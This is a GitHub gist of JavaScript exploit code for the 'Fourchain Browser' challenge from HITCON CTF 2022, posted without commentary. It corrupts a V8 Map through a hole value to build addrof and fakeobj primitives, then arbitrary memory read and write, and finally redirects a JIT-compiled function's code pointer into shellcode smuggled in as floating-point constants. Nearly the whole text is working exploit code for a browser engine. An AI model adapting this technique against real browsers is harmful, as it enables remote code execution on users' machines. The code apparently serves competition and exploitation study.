Created
November 29, 2022 19:19
-
-
Save dkdna/de3eaf6564940d51e5acfca64013df46 to your computer and use it in GitHub Desktop.
HITCON CTF 2022 - Fourchain Browser
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| let ab = new ArrayBuffer(8); | |
| let f64a = new Float64Array(ab); | |
| let u64a = new BigUint64Array(ab); | |
| function f2i(v) { | |
| f64a[0] = v; | |
| return u64a[0]; | |
| } | |
| function i2f(v) { | |
| u64a[0] = v; | |
| return f64a[0]; | |
| } | |
| function gc() { | |
| for (let i = 0; i < 100; i++) { | |
| new ArrayBuffer(0x100000); | |
| } | |
| } | |
| const foo = () => | |
| { | |
| return [1.0, | |
| 1.9553825422107533e-246, | |
| 1.9560612558242147e-246, | |
| 1.9995714719542577e-246, | |
| 1.9533767332674093e-246, | |
| 2.6348604765229606e-284]; | |
| } | |
| const f = () => { return 1; } | |
| for (let i = 0; i < 0x10000; i++) { | |
| foo(); | |
| } | |
| gc(); | |
| var arr = new Array(); | |
| var map = null; | |
| var dbl_arr = null; | |
| var obj_arr = null; | |
| function getmap() { | |
| m = new Map(); | |
| m.set(1, 1); | |
| m.set(arr.hole(), 1); | |
| m.delete(arr.hole()); | |
| m.delete(arr.hole()); | |
| m.delete(1); | |
| return m; | |
| } | |
| for (let i = 0; i < 0x3000; i++) { | |
| map = getmap(); | |
| dbl_arr = new Array(1.1, 1.1); | |
| obj_arr = new Array({}, {}); | |
| } | |
| var tmp_float = new Array(13.37, 13.37); | |
| map.set(0x10, -1); | |
| map.set(dbl_arr, 0xffff); | |
| var offset = 0xe; | |
| function addrof(obj) { | |
| obj_arr[0] = obj; | |
| return f2i(dbl_arr[offset]) & 0xffffffffn; | |
| } | |
| function fakeobj(addr) { | |
| dbl_arr[offset] = i2f(0x200000000n + addr); | |
| return obj_arr[0]; | |
| } | |
| var float_map = f2i(dbl_arr[0xf]) & 0xffffffffn; | |
| var target = [i2f(float_map), 13.37, 13.37, 13.37]; | |
| var fake = fakeobj(addrof(target) + 0x20n); | |
| function read(addr) { | |
| if (addr % 2n == 0) { | |
| addr += 1n; | |
| } | |
| target[1] = i2f((2n << 32n) + addr - 8n); | |
| return f2i(fake[0]); | |
| } | |
| function write(addr, val) { | |
| if (addr % 2n == 0) { | |
| addr += 1n; | |
| } | |
| target[1] = i2f((2n << 32n) + addr - 8n); | |
| fake[0] = i2f(BigInt(val)); | |
| } | |
| var foo_addr = addrof(foo); | |
| var addr2 = read(foo_addr + 0x18n) & 0xffffffffn; | |
| var jit_off = 0x73n // 0x7c for remote | |
| var code_addr = read(addr2 + 0xcn) + jit_off; | |
| write(addr2 + 0xcn, code_addr); | |
| foo(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment